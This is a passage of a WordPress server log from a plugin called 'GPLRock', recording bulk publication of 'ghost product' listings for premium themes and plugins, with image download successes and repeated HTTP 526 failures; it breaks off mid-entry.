formidable-forms-wpml-multilingual: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b656c289.jpg [30-Mar-2026 02:09:12 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-wpml-multilingual [30-Mar-2026 02:09:13 UTC] GPLRock: Image downloaded successfully for product wpforms-custom-captcha (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97013447.jpg [30-Mar-2026 02:09:13 UTC] GPLRock: Using pre-downloaded image for product wpforms-custom-captcha: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97013447.jpg [30-Mar-2026 02:09:13 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-custom-captcha [30-Mar-2026 02:09:14 UTC] GPLRock: Image downloaded successfully for product maintenance-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5591dd1d.jpg [30-Mar-2026 02:09:15 UTC] GPLRock: Using pre-downloaded image for product maintenance-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5591dd1d.jpg [30-Mar-2026 02:09:16 UTC] GPLRock: Ghost product published with image - Product ID: maintenance-pro-wordpress-plugin [30-Mar-2026 02:09:22 UTC] GPLRock: Image downloaded successfully for product lucille-music-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7839215b.jpg [30-Mar-2026 02:09:22 UTC] GPLRock: Using pre-downloaded image for product lucille-music-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7839215b.jpg [30-Mar-2026 02:09:22 UTC] GPLRock: Ghost product published with image - Product ID: lucille-music-wordpress-theme [30-Mar-2026 02:09:24 UTC] GPLRock: Image downloaded successfully for product story-creative-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d604f0d.jpg [30-Mar-2026 02:09:24 UTC] GPLRock: Using pre-downloaded image for product story-creative-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d604f0d.jpg [30-Mar-2026 02:09:24 UTC] GPLRock: Ghost product published with image - Product ID: story-creative-responsive-multi-purpose-theme [30-Mar-2026 02:09:25 UTC] GPLRock: Image downloaded successfully for product the-keynote-conference-event-meeting-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-015ac776.jpg [30-Mar-2026 02:09:25 UTC] GPLRock: Using pre-downloaded image for product the-keynote-conference-event-meeting-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-015ac776.jpg [30-Mar-2026 02:09:25 UTC] GPLRock: Ghost product published with image - Product ID: the-keynote-conference-event-meeting-wordpress-theme [30-Mar-2026 02:09:26 UTC] GPLRock: Image downloaded successfully for product homey-booking-and-rentals-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b05b4a12.jpg [30-Mar-2026 02:09:27 UTC] GPLRock: Using pre-downloaded image for product homey-booking-and-rentals-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b05b4a12.jpg [30-Mar-2026 02:09:27 UTC] GPLRock: Ghost product published with image - Product ID: homey-booking-and-rentals-wordpress-theme [30-Mar-2026 02:09:28 UTC] GPLRock: Image downloaded successfully for product reco-minimal-lightweight-theme-for-freebies (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e780aa05.jpg [30-Mar-2026 02:09:28 UTC] GPLRock: Using pre-downloaded image for product reco-minimal-lightweight-theme-for-freebies: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e780aa05.jpg [30-Mar-2026 02:09:28 UTC] GPLRock: Ghost product published with image - Product ID: reco-minimal-lightweight-theme-for-freebies [30-Mar-2026 02:09:30 UTC] GPLRock: Image downloaded successfully for product timetable-responsive-schedule-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dfb34cf.jpg [30-Mar-2026 02:09:31 UTC] GPLRock: Using pre-downloaded image for product timetable-responsive-schedule-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dfb34cf.jpg [30-Mar-2026 02:09:32 UTC] GPLRock: Ghost product published with image - Product ID: timetable-responsive-schedule-for-wordpress [30-Mar-2026 02:45:47 UTC] GPLRock: Image downloaded successfully for product envira-gallery-fullscreen-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1d2c010.jpg [30-Mar-2026 02:45:48 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-fullscreen-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1d2c010.jpg [30-Mar-2026 02:45:48 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-fullscreen-addon [30-Mar-2026 02:45:49 UTC] GPLRock: Image downloaded successfully for product yith-globe-hi-tech-wordpress-e-commerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2ed3d58.jpg [30-Mar-2026 02:45:49 UTC] GPLRock: Using pre-downloaded image for product yith-globe-hi-tech-wordpress-e-commerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2ed3d58.jpg [30-Mar-2026 02:45:49 UTC] GPLRock: Ghost product published with image - Product ID: yith-globe-hi-tech-wordpress-e-commerce-theme [30-Mar-2026 02:45:53 UTC] GPLRock: Image downloaded successfully for product yith-iris-interior-design-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff972d71.jpg [30-Mar-2026 02:45:54 UTC] GPLRock: Using pre-downloaded image for product yith-iris-interior-design-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff972d71.jpg [30-Mar-2026 02:45:54 UTC] GPLRock: Ghost product published with image - Product ID: yith-iris-interior-design-wordpress-theme [30-Mar-2026 03:28:11 UTC] GPLRock: Image download failed for product gesso-art-print-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:13 UTC] GPLRock: Image download failed for product gesso-art-print-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gesso---art--print-shop-wordpress-theme-32915.webp for product gesso-art-print-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:15 UTC] GPLRock: Image download failed for product gesso-art-print-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:17 UTC] GPLRock: Image download failed for product gesso-art-print-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gesso---art--print-shop-wordpress-theme-32915.webp for product gesso-art-print-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:19 UTC] GPLRock WARNING: Image download failed for product gesso-art-print-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gesso---art--print-shop-wordpress-theme-32915.webp [30-Mar-2026 03:28:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gesso-art-print-shop-wordpress-theme [30-Mar-2026 03:28:20 UTC] GPLRock: Image download failed for product openhub-a-stylish-events-conference-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:22 UTC] GPLRock: Image download failed for product openhub-a-stylish-events-conference-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/openhub---a-stylish-events--conference-theme-24179.webp for product openhub-a-stylish-events-conference-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:24 UTC] GPLRock: Image download failed for product openhub-a-stylish-events-conference-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:26 UTC] GPLRock: Image download failed for product openhub-a-stylish-events-conference-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/openhub---a-stylish-events--conference-theme-24179.webp for product openhub-a-stylish-events-conference-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:28 UTC] GPLRock WARNING: Image download failed for product openhub-a-stylish-events-conference-theme. URL: https://meldwp.com/wp-content/uploads/openhub---a-stylish-events--conference-theme-24179.webp [30-Mar-2026 03:28:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: openhub-a-stylish-events-conference-theme [30-Mar-2026 03:28:28 UTC] GPLRock: Image download failed for product leonas-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:30 UTC] GPLRock: Image download failed for product leonas-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leonas---magazine-and-blog-wordpress-theme-12483.webp for product leonas-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:33 UTC] GPLRock: Image download failed for product leonas-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:35 UTC] GPLRock: Image download failed for product leonas-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leonas---magazine-and-blog-wordpress-theme-12483.webp for product leonas-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:37 UTC] GPLRock WARNING: Image download failed for product leonas-magazine-and-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/leonas---magazine-and-blog-wordpress-theme-12483.webp [30-Mar-2026 03:28:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leonas-magazine-and-blog-wordpress-theme [30-Mar-2026 03:28:38 UTC] GPLRock: Image downloaded successfully for product quill-blog-responsive-minimal-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b4ea5bb.webp [30-Mar-2026 03:28:38 UTC] GPLRock: Using pre-downloaded image for product quill-blog-responsive-minimal-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b4ea5bb.webp [30-Mar-2026 03:28:38 UTC] GPLRock: Ghost product published with image - Product ID: quill-blog-responsive-minimal-wordpress-theme [30-Mar-2026 03:28:38 UTC] GPLRock: Image download failed for product wikb-knowledgebase-help-desk-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:40 UTC] GPLRock: Image download failed for product wikb-knowledgebase-help-desk-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wikb---knowledgebase--help-desk-wp-theme-24383.webp for product wikb-knowledgebase-help-desk-wp-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:42 UTC] GPLRock: Image download failed for product wikb-knowledgebase-help-desk-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:44 UTC] GPLRock: Image download failed for product wikb-knowledgebase-help-desk-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wikb---knowledgebase--help-desk-wp-theme-24383.webp for product wikb-knowledgebase-help-desk-wp-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:46 UTC] GPLRock WARNING: Image download failed for product wikb-knowledgebase-help-desk-wp-theme. URL: https://meldwp.com/wp-content/uploads/wikb---knowledgebase--help-desk-wp-theme-24383.webp [30-Mar-2026 03:28:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wikb-knowledgebase-help-desk-wp-theme [30-Mar-2026 03:28:47 UTC] GPLRock: Image download failed for product newz-live-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:49 UTC] GPLRock: Image download failed for product newz-live-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newz-live---news-wordpress-theme-31201.webp for product newz-live-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:52 UTC] GPLRock: Image download failed for product newz-live-news-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:54 UTC] GPLRock: Image download failed for product newz-live-news-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newz-live---news-wordpress-theme-31201.webp for product newz-live-news-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:28:56 UTC] GPLRock WARNING: Image download failed for product newz-live-news-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/newz-live---news-wordpress-theme-31201.webp [30-Mar-2026 03:28:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newz-live-news-wordpress-theme [30-Mar-2026 03:28:56 UTC] GPLRock: Image download failed for product musart-music-label-and-artists-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:28:58 UTC] GPLRock: Image download failed for product musart-music-label-and-artists-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musart---music-label-and-artists-wordpress-theme-28418.webp for product musart-music-label-and-artists-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:00 UTC] GPLRock: Image download failed for product musart-music-label-and-artists-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:02 UTC] GPLRock: Image download failed for product musart-music-label-and-artists-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musart---music-label-and-artists-wordpress-theme-28418.webp for product musart-music-label-and-artists-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:05 UTC] GPLRock WARNING: Image download failed for product musart-music-label-and-artists-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/musart---music-label-and-artists-wordpress-theme-28418.webp [30-Mar-2026 03:29:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musart-music-label-and-artists-wordpress-theme [30-Mar-2026 03:29:06 UTC] GPLRock: Image download failed for product stockton-business-financial-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:08 UTC] GPLRock: Image download failed for product stockton-business-financial-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stockton---business--financial-consulting-wordpress-theme-8022.webp for product stockton-business-financial-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:11 UTC] GPLRock: Image download failed for product stockton-business-financial-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:13 UTC] GPLRock: Image download failed for product stockton-business-financial-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stockton---business--financial-consulting-wordpress-theme-8022.webp for product stockton-business-financial-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:15 UTC] GPLRock WARNING: Image download failed for product stockton-business-financial-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stockton---business--financial-consulting-wordpress-theme-8022.webp [30-Mar-2026 03:29:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stockton-business-financial-consulting-wordpress-theme [30-Mar-2026 03:29:15 UTC] GPLRock: Image download failed for product autism-autistic-children-care-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:17 UTC] GPLRock: Image download failed for product autism-autistic-children-care-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autism---autistic-children-care-wordpress-theme--rtl-16972.webp for product autism-autistic-children-care-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:20 UTC] GPLRock: Image download failed for product autism-autistic-children-care-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:22 UTC] GPLRock: Image download failed for product autism-autistic-children-care-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autism---autistic-children-care-wordpress-theme--rtl-16972.webp for product autism-autistic-children-care-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:24 UTC] GPLRock WARNING: Image download failed for product autism-autistic-children-care-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/autism---autistic-children-care-wordpress-theme--rtl-16972.webp [30-Mar-2026 03:29:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autism-autistic-children-care-wordpress-theme-rtl [30-Mar-2026 03:29:24 UTC] GPLRock: Image download failed for product sweipe-responsive-wordpress-mobile-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:26 UTC] GPLRock: Image download failed for product sweipe-responsive-wordpress-mobile-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweipe---responsive-wordpress-mobile-theme-1408.webp for product sweipe-responsive-wordpress-mobile-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:29 UTC] GPLRock: Image download failed for product sweipe-responsive-wordpress-mobile-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:31 UTC] GPLRock: Image download failed for product sweipe-responsive-wordpress-mobile-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [30-Mar-2026 03:29:32 UTC] GPLRock: Image downloaded successfully for product easy-table-of-contents-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ac008ae.jpg [30-Mar-2026 03:29:32 UTC] GPLRock: Using pre-downloaded image for product easy-table-of-contents-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ac008ae.jpg [30-Mar-2026 03:29:32 UTC] GPLRock: Ghost product published with image - Product ID: easy-table-of-contents-for-amp [30-Mar-2026 03:29:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweipe---responsive-wordpress-mobile-theme-1408.webp for product sweipe-responsive-wordpress-mobile-theme after 3 attempts. HTTP Code: 526, Error: [30-Mar-2026 03:29:33 UTC] GPLRock WARNING: Image download failed for product sweipe-responsive-wordpress-mobile-theme. URL: https://meldwp.com/wp-content/uploads/sweipe---responsive-wordpress-mobile-theme-1408.webp [30-Mar-2026 03:29:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sweipe-responsive-wordpress-mobile-theme [30-Mar-2026 03:29:35 UTC] GPLRock: Image downloaded successfully for product captcha-plus-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2fc1904.jpg [30-Mar-2026 03:29:35 UTC] GPLRock: Using pre-downloaded image for product captcha-plus-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2fc1904.jpg [30-Mar-2026 03:29:35 UTC] GPLRock: Ghost product published with image - Product ID: captcha-plus-wordpress-plugin [30-Mar-2026 03:29:39 UTC] GPLRock: Image downloaded successfully for product coder-syntax-highlighter-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-183eb341.jpg [30-Mar-2026 03:29:39 UTC] GPLRock: Using pre-downloaded image for product coder-syntax-highlighter-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-183eb341.jpg [30-Mar-2026 03:29:39 UTC] GPLRock: Ghost product published with image - Product ID: coder-syntax-highlighter-for-elementor [30-Mar-2026 03:29:43 UTC] GPLRock: Image downloaded successfully for product affiliate-butler-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2085dcf.png [30-Mar-2026 03:29:43 UTC] GPLRock: Using pre-downloaded image for product affiliate-butler-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2085dcf.png [30-Mar-2026 03:29:43 UTC] GPLRock: Ghost product published with image - Product ID: affiliate-butler-pro [30-Mar-2026 03:29:47 UTC] GPLRock: Image downloaded successfully for product studiopress-agent-focused-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d23a221d.png [30-Mar-2026 03:29:48 UTC] GPLRock: Using pre-downloaded image for product studiopress-agent-focused-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d23a221d.png [30-Mar-2026 03:29:49 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-agent-focused-pro-genesis-wordpress-theme [30-Mar-2026 03:29:53 UTC] GPLRock: Image downloaded successfully for product rogan-creative-multipurpose-html-rtl-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39680144.jpg [30-Mar-2026 03:29:53 UTC] GPLRock: Using pre-downloaded image for product rogan-creative-multipurpose-html-rtl-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39680144.jpg [30-Mar-2026 03:29:53 UTC] GPLRock: Ghost product published with image - Product ID: rogan-creative-multipurpose-html-rtl-template [30-Mar-2026 03:29:54 UTC] GPLRock: Image downloaded successfully for product quanzo-personal-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2390567.jpg [30-Mar-2026 03:29:54 UTC] GPLRock: Using pre-downloaded image for product quanzo-personal-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2390567.jpg [30-Mar-2026 03:29:54 UTC] GPLRock: Ghost product published with image - Product ID: quanzo-personal-portfolio-wordpress-theme [30-Mar-2026 03:29:57 UTC] GPLRock: Image downloaded successfully for product appui-web-app-bootstrap-admin-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f98e686e.jpg [30-Mar-2026 03:29:57 UTC] GPLRock: Using pre-downloaded image for product appui-web-app-bootstrap-admin-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f98e686e.jpg [30-Mar-2026 03:29:57 UTC] GPLRock: Ghost product published with image - Product ID: appui-web-app-bootstrap-admin-template [30-Mar-2026 03:30:05 UTC] GPLRock: Image downloaded successfully for product reon-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-248a67f2.jpg [30-Mar-2026 03:30:05 UTC] GPLRock: Using pre-downloaded image for product reon-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-248a67f2.jpg [30-Mar-2026 03:30:05 UTC] GPLRock: Ghost product published with image - Product ID: reon-restaurant-wordpress-theme [30-Mar-2026 03:30:07 UTC] GPLRock: Image downloaded successfully for product cryptum-luxurious-cryptocurrency-material-design-admin-dashboard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-695e1d38.jpg [30-Mar-2026 03:30:07 UTC] GPLRock: Using pre-downloaded image for product cryptum-luxurious-cryptocurrency-material-design-admin-dashboard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-695e1d38.jpg [30-Mar-2026 03:30:07 UTC] GPLRock: Ghost product published with image - Product ID: cryptum-luxurious-cryptocurrency-material-design-admin-dashboard [31-Mar-2026 01:25:14 UTC] GPLRock: Image downloaded successfully for product carbon-car-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aced65d5.webp [31-Mar-2026 01:25:14 UTC] GPLRock: Using pre-downloaded image for product carbon-car-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aced65d5.webp [31-Mar-2026 01:25:14 UTC] GPLRock: Ghost product published with image - Product ID: carbon-car-service-elementor-template-kit [31-Mar-2026 01:25:24 UTC] GPLRock: Image download failed for product cantiq-beauty-spa-salon-therapy-elementor-template-kit (attempt 1/3). HTTP Code: 0, Error: Connection timed out after 10001 milliseconds. Retrying... [31-Mar-2026 01:25:27 UTC] GPLRock: Image downloaded successfully for product cantiq-beauty-spa-salon-therapy-elementor-template-kit (attempt 2) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e915211.webp [31-Mar-2026 01:25:27 UTC] GPLRock: Using pre-downloaded image for product cantiq-beauty-spa-salon-therapy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e915211.webp [31-Mar-2026 01:25:27 UTC] GPLRock: Ghost product published with image - Product ID: cantiq-beauty-spa-salon-therapy-elementor-template-kit [31-Mar-2026 01:25:31 UTC] GPLRock: Image downloaded successfully for product cannabia-medical-marijuana-cbd-oil-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05a56c44.jpg [31-Mar-2026 01:25:31 UTC] GPLRock: Using pre-downloaded image for product cannabia-medical-marijuana-cbd-oil-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05a56c44.jpg [31-Mar-2026 01:25:31 UTC] GPLRock: Ghost product published with image - Product ID: cannabia-medical-marijuana-cbd-oil-elementor-template-kit [31-Mar-2026 01:25:33 UTC] GPLRock: Image downloaded successfully for product campusa-university-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3193b409.webp [31-Mar-2026 01:25:33 UTC] GPLRock: Using pre-downloaded image for product campusa-university-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3193b409.webp [31-Mar-2026 01:25:33 UTC] GPLRock: Ghost product published with image - Product ID: campusa-university-school-elementor-template-kit [31-Mar-2026 01:25:36 UTC] GPLRock: Image downloaded successfully for product cameos-film-maker-movie-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a0522dc.webp [31-Mar-2026 01:25:36 UTC] GPLRock: Using pre-downloaded image for product cameos-film-maker-movie-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a0522dc.webp [31-Mar-2026 01:25:36 UTC] GPLRock: Ghost product published with image - Product ID: cameos-film-maker-movie-studio-elementor-template-kit [31-Mar-2026 01:25:37 UTC] GPLRock: Image downloaded successfully for product calliam-creative-cv-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b815de77.webp [31-Mar-2026 01:25:37 UTC] GPLRock: Using pre-downloaded image for product calliam-creative-cv-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b815de77.webp [31-Mar-2026 01:25:37 UTC] GPLRock: Ghost product published with image - Product ID: calliam-creative-cv-elementor-template-kit [31-Mar-2026 01:25:43 UTC] GPLRock: Image downloaded successfully for product callegari-builders-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-204b80a6.webp [31-Mar-2026 01:25:43 